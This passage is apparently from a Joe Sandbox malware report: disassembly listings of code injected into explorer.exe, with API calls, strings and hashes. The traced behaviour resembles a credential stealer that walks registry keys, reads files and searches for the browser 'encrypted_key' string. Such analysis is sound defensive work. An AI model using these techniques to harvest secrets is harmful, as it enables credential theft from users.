                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                                                • String ID: PathToExe
                                                                                                                                                                • API String ID: 1799103994-1982016430
                                                                                                                                                                • Opcode ID: b2d162e315483110f2a6a34666caa43246e48d18a531c7a3322c64717736db50
                                                                                                                                                                • Instruction ID: 97ba5d929a27a98921c948537841affc51acc9f5a70ceb94672b2de471b230c5
                                                                                                                                                                • Opcode Fuzzy Hash: b2d162e315483110f2a6a34666caa43246e48d18a531c7a3322c64717736db50
                                                                                                                                                                • Instruction Fuzzy Hash: 3E317E716143116F9B19AF21CC16D6F7AA9EFC8350F04452CFC6987281DA34CD05EBE6

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 782 c3a67c-c3a692 783 c3a6c1-c3a6c4 782->783 784 c3a694-c3a6bf _alldiv _allmul 782->784 785 c3a6c7-c3a6d2 call c3a33b 783->785 784->785 788 c3a6f0-c3a6fb SetEndOfFile 785->788 789 c3a6d4-c3a6df 785->789 791 c3a71e 788->791 792 c3a6fd-c3a708 788->792 790 c3a6e4-c3a6ee call c3a1c6 789->790 793 c3a722-c3a726 790->793 791->793 792->791 800 c3a70a-c3a71c 792->800 795 c3a73a-c3a740 793->795 796 c3a728-c3a72b 793->796 796->795 799 c3a72d 796->799 801 c3a734-c3a737 799->801 802 c3a72f-c3a732 799->802 800->790 801->795 802->795 802->801
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File_alldiv_allmul
                                                                                                                                                                • String ID: winTruncate1$winTruncate2
                                                                                                                                                                • API String ID: 3568847005-470713972
                                                                                                                                                                • Opcode ID: b233b954cc0258bf034c8228b8e7b52c57b405ef51b3617ac1e567f889db9567
                                                                                                                                                                • Instruction ID: a384d4e552828f31b06d1137fbbf4d5b4f6175a406ddd2002a9a816328dfe398
                                                                                                                                                                • Opcode Fuzzy Hash: b233b954cc0258bf034c8228b8e7b52c57b405ef51b3617ac1e567f889db9567
                                                                                                                                                                • Instruction Fuzzy Hash: DE21D172221200ABCB149F2DCCC6E6B77B9EF85310F158169FD94DB295D635DC60CBA2
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • wsprintfW.USER32 ref: 00C34AA2
                                                                                                                                                                • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00C34AC7
                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00C34AD4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                                                • String ID: %s\%08x$Software
                                                                                                                                                                • API String ID: 1800864259-1658101971
                                                                                                                                                                • Opcode ID: f0da2cb21db12b6381db8946dffabb6d118e4e08eb27b6789d86b7a0b97ec927
                                                                                                                                                                • Instruction ID: c75c6d67160e7e20b5116be92f457cff13d1214494e8ebaba1ab29705438bedb
                                                                                                                                                                • Opcode Fuzzy Hash: f0da2cb21db12b6381db8946dffabb6d118e4e08eb27b6789d86b7a0b97ec927
                                                                                                                                                                • Instruction Fuzzy Hash: A301F271610108BF9B189F94DC8AFBF77ADEB40358F40016EF905A3141EBB16E80A769
                                                                                                                                                                APIs
                                                                                                                                                                • _alloca_probe.NTDLL ref: 00C3431C
                                                                                                                                                                • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00C34335
                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C34363
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00C343C8
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                  • Part of subcall function 00C3418A: wsprintfW.USER32 ref: 00C34212
                                                                                                                                                                  • Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
                                                                                                                                                                  • Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027
                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C343B9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 801677237-0
                                                                                                                                                                • Opcode ID: 23c7e465ae7a92d7dc64de8f80a8b3a13caf833171fd4f19ab9475d3612c9e3c
                                                                                                                                                                • Instruction ID: 4201fc135146588791dfb1ff22faa86116acb37ffaf9ab1aa1b42a55ea224897
                                                                                                                                                                • Opcode Fuzzy Hash: 23c7e465ae7a92d7dc64de8f80a8b3a13caf833171fd4f19ab9475d3612c9e3c
                                                                                                                                                                • Instruction Fuzzy Hash: 3D1142B1114201BFE719AB10CC45EBF77EDEB88344F00452DF889D2150EB74AE489B66
                                                                                                                                                                APIs
                                                                                                                                                                • memset.NTDLL ref: 00C3B8D5
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 00C3B96F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFilememset
                                                                                                                                                                • String ID: psow$winOpen
                                                                                                                                                                • API String ID: 2416746761-4101858489
                                                                                                                                                                • Opcode ID: 35d33bc459617ded6080ae5777a2410bc01df7470760e988bc5b37d789f23dd7
                                                                                                                                                                • Instruction ID: c391cd69ed51b4a5f4a9ace8994de1b278397f6a8ed1eca83e594fe8b9076ad9
                                                                                                                                                                • Opcode Fuzzy Hash: 35d33bc459617ded6080ae5777a2410bc01df7470760e988bc5b37d789f23dd7
                                                                                                                                                                • Instruction Fuzzy Hash: 3371A371A24702AFC710DF25C88175AB7E0FF88324F144A2DFA6497281D774DE14EB92
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C97000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C97000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c97000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7ec39b98aacfc8256404db966de7e7b960e07ebeaebc70c610e59104207a7ecd
                                                                                                                                                                • Instruction ID: 2dc41ca7e47a53bbdc9ed659214b8f7dfd47ad045b2918da17ca62424422f815
                                                                                                                                                                • Opcode Fuzzy Hash: 7ec39b98aacfc8256404db966de7e7b960e07ebeaebc70c610e59104207a7ecd
                                                                                                                                                                • Instruction Fuzzy Hash: 5EA14B729547525BDF228E7CCCC86A1BBA0EB52324B2D076CC5E18B2D2E7709907C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
                                                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
                                                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98
                                                                                                                                                                  • Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
                                                                                                                                                                  • Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 217796345-0
                                                                                                                                                                • Opcode ID: e2175ef1f018b5860b6bf2b0c5b85a847c0d63b865958797718678bdcee655a6
                                                                                                                                                                • Instruction ID: e4c37d887e711482306d5d133f0c89560aff50224ad988ab08e278dbefb0f90d
                                                                                                                                                                • Opcode Fuzzy Hash: e2175ef1f018b5860b6bf2b0c5b85a847c0d63b865958797718678bdcee655a6
                                                                                                                                                                • Instruction Fuzzy Hash: 6321E572216345AFE7248B21CD04F7FB7E8EBC8755F080A2DFD9692140E720CE40A721
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00C31ED5
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C31F0C
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00C31F98
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C31F82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1077800024-0
                                                                                                                                                                • Opcode ID: 6b939bd455c50636a34c5dc24951c8cb0efe3d1c6e7d55eba13cf135bf514da5
                                                                                                                                                                • Instruction ID: a10dab88fdc73c81de99faab5666331bc2e1e3a5669ff0b59746e481ad1ce224
                                                                                                                                                                • Opcode Fuzzy Hash: 6b939bd455c50636a34c5dc24951c8cb0efe3d1c6e7d55eba13cf135bf514da5
                                                                                                                                                                • Instruction Fuzzy Hash: 93218C71218301AFD705AB61CC48E2FBBEDEF88354F04892DF89A92110DB35CD05AB66
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00C33E1E,00000000,?,00C33FA8), ref: 00C31C46
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00C33FA8), ref: 00C31C56
                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,00C33FA8), ref: 00C31C91
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00C33FA8), ref: 00C31C76
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2517252058-0
                                                                                                                                                                • Opcode ID: 7d3760651b7cb9c9092d1bfde047fdfd7e50afa7f0c0f8d75f98fa2540003ed0
                                                                                                                                                                • Instruction ID: a4c1434a31d9a46f432fb88a163269bca59f9d61fe5dafb68e5c764c61b5c4cf
                                                                                                                                                                • Opcode Fuzzy Hash: 7d3760651b7cb9c9092d1bfde047fdfd7e50afa7f0c0f8d75f98fa2540003ed0
                                                                                                                                                                • Instruction Fuzzy Hash: EBF028312102187FC2241B25EC88F7F7A5CDB427F9F190318FC16D21D0DB126C015678
                                                                                                                                                                APIs
                                                                                                                                                                • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00C33E30,00000000,00000000,?,00C33FA8), ref: 00C32FC1
                                                                                                                                                                • lstrlen.KERNEL32("encrypted_key":",?,00C33FA8), ref: 00C32FCE
                                                                                                                                                                • StrStrIA.SHLWAPI("encrypted_key":",00C8692C,?,00C33FA8), ref: 00C32FDD
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrlen.KERNEL32(?,?,?,?,00000000,00C32783), ref: 00C3192B
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00C32783), ref: 00C31930
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,?), ref: 00C31946
                                                                                                                                                                  • Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,00000000), ref: 00C3194A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                • String ID: "encrypted_key":"
                                                                                                                                                                • API String ID: 493641738-877455259
                                                                                                                                                                • Opcode ID: 7609b8c0d053ab1cabaff407476732b7e3c5ca70356f8c21104654de51832286
                                                                                                                                                                • Instruction ID: 7bd78b06d301c94e3e79f7e08cb1228d3370c4ff9c70d69efe7c6bd4c1ed408f
                                                                                                                                                                • Opcode Fuzzy Hash: 7609b8c0d053ab1cabaff407476732b7e3c5ca70356f8c21104654de51832286
                                                                                                                                                                • Instruction Fuzzy Hash: DDE0923261AB747F87756BF51C98B8F7F689F0A6157090078F61197223DE928901D3A8
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 00C3BB40
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID: winDelete
                                                                                                                                                                • API String ID: 3188754299-3936022152
                                                                                                                                                                • Opcode ID: c785c943caa2bb186f678c065ff0ea623d757bc9c526b14c203087bfb602c4ff
                                                                                                                                                                • Instruction ID: 6a75aefb14fd55c7747a22df6c7bc23d0b63c7e3be82f5b67e02768a12001b0f
                                                                                                                                                                • Opcode Fuzzy Hash: c785c943caa2bb186f678c065ff0ea623d757bc9c526b14c203087bfb602c4ff
                                                                                                                                                                • Instruction Fuzzy Hash: BF11C431A20208EBD710AB69C846A7DF775DF91764F104125FA26D7288DF308E01A752
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
                                                                                                                                                                  • Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00C32EE4
                                                                                                                                                                • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00C32F54
                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00C32F62
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1066184869-0
                                                                                                                                                                • Opcode ID: dc35e9be6fdaf38c1d992908586172779a804df45974dd8737f2be413092d49b
                                                                                                                                                                • Instruction ID: fa6313d4af09420916dbb8f22cfe46f4d44c67945c29ebf6511e8e4c878c2b0e
                                                                                                                                                                • Opcode Fuzzy Hash: dc35e9be6fdaf38c1d992908586172779a804df45974dd8737f2be413092d49b
                                                                                                                                                                • Instruction Fuzzy Hash: F301D635214250AFCB199F21DC05EAF7FA9EFC8350F04442DF85A82150CB358945FBE6
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitInitializeProcessUninitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4175140541-0
                                                                                                                                                                • Opcode ID: 53142dbcb0cd28474f3c657ecfd29d76d0aec730ea85e76055c7014b0857564b
                                                                                                                                                                • Instruction ID: 4a1efe2cf94a8d85e031cd9746461b0ac3765bffea370d95d3998f1b02bbc29f
                                                                                                                                                                • Opcode Fuzzy Hash: 53142dbcb0cd28474f3c657ecfd29d76d0aec730ea85e76055c7014b0857564b
                                                                                                                                                                • Instruction Fuzzy Hash: 6CC092303A42108BEA843BF0AC0E70D3A24EF00B27F004040F20AC91A2DBA0A4009B3A
                                                                                                                                                                APIs
                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00C39FF8
                                                                                                                                                                Strings
                                                                                                                                                                • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00C3A00E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                                • API String ID: 10892065-982776804
                                                                                                                                                                • Opcode ID: 54d483f73e8c9feb0c862aa4ede415ecef726e828471d8d49fc748ec5e369dee
                                                                                                                                                                • Instruction ID: ada65687f9995028ea494e66ae3de7ca46d698e692ab55414887f01a3e45ed12
                                                                                                                                                                • Opcode Fuzzy Hash: 54d483f73e8c9feb0c862aa4ede415ecef726e828471d8d49fc748ec5e369dee
                                                                                                                                                                • Instruction Fuzzy Hash: 9AF02B72628741BFE7301A94DC89F2B779CD798785F24042AFD97D2140E6B0AC008331
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00C32E83,PathToExe,00000000,00000000), ref: 00C31B16
                                                                                                                                                                  • Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
                                                                                                                                                                  • Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027
                                                                                                                                                                  • Part of subcall function 00C319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
                                                                                                                                                                  • Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
                                                                                                                                                                  • Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
                                                                                                                                                                  • Part of subcall function 00C319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98
                                                                                                                                                                Strings
                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00C31B40
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                • API String ID: 2162223993-2036018995
                                                                                                                                                                • Opcode ID: f9ad762ef0bf7841fba17096eccb39daa40d5f4100ba8ddfe68fe9216a9092e2
                                                                                                                                                                • Instruction ID: 730b2b97fae82511fc96169c6d166fccdcfd72d60912bfa4e95d9170c0ab7c6e
                                                                                                                                                                • Opcode Fuzzy Hash: f9ad762ef0bf7841fba17096eccb39daa40d5f4100ba8ddfe68fe9216a9092e2
                                                                                                                                                                • Instruction Fuzzy Hash: C3F059777106485FC6116A2ACC88E7B764ECBC13AAB0F0029FC2983201EE236C419274
                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00C3A35F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                • String ID: winSeekFile
                                                                                                                                                                • API String ID: 973152223-3168307952
                                                                                                                                                                • Opcode ID: c87bf8b0f178e8dfa3e0b170f0b13c9b4b46365e3a4acbd7e7af3b103f1fa22e
                                                                                                                                                                • Instruction ID: e5d9b47dbab98b8ceeb754712b8a5c9ef72cdead017aab2449e2fa73175951ab
                                                                                                                                                                • Opcode Fuzzy Hash: c87bf8b0f178e8dfa3e0b170f0b13c9b4b46365e3a4acbd7e7af3b103f1fa22e
                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0B430624204AFD7119F64DC05BBB77EEEB45320F14836AFDB1C62E0EA30DD10AAA1
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(05240000,00000000,?), ref: 00C39EB5
                                                                                                                                                                Strings
                                                                                                                                                                • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00C39ECD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                                                • API String ID: 1279760036-667713680
                                                                                                                                                                • Opcode ID: 51894a8d036195b1432591e5264a86ed8966cfbc7f6c11e2f2a31565d8ae6bd2
                                                                                                                                                                • Instruction ID: 3d3d227c4d6eb5e73b00b0c7338b97a6d8547ecd0dfb4e9848c8c333c91e418b
                                                                                                                                                                • Opcode Fuzzy Hash: 51894a8d036195b1432591e5264a86ed8966cfbc7f6c11e2f2a31565d8ae6bd2
                                                                                                                                                                • Instruction Fuzzy Hash: 83E0C2776082117FC2222B84AC0AF2FB768EB94F50F050116FE10A2270C674DC01A7A2
                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(05240000,00000000,?), ref: 00C39EF8
                                                                                                                                                                Strings
                                                                                                                                                                • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00C39F0E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                                                • API String ID: 3298025750-4030396798
                                                                                                                                                                • Opcode ID: cbe8948d5ade575d44e794d1641bd9d9b11266bb2653815a7852c45f3c3c2737
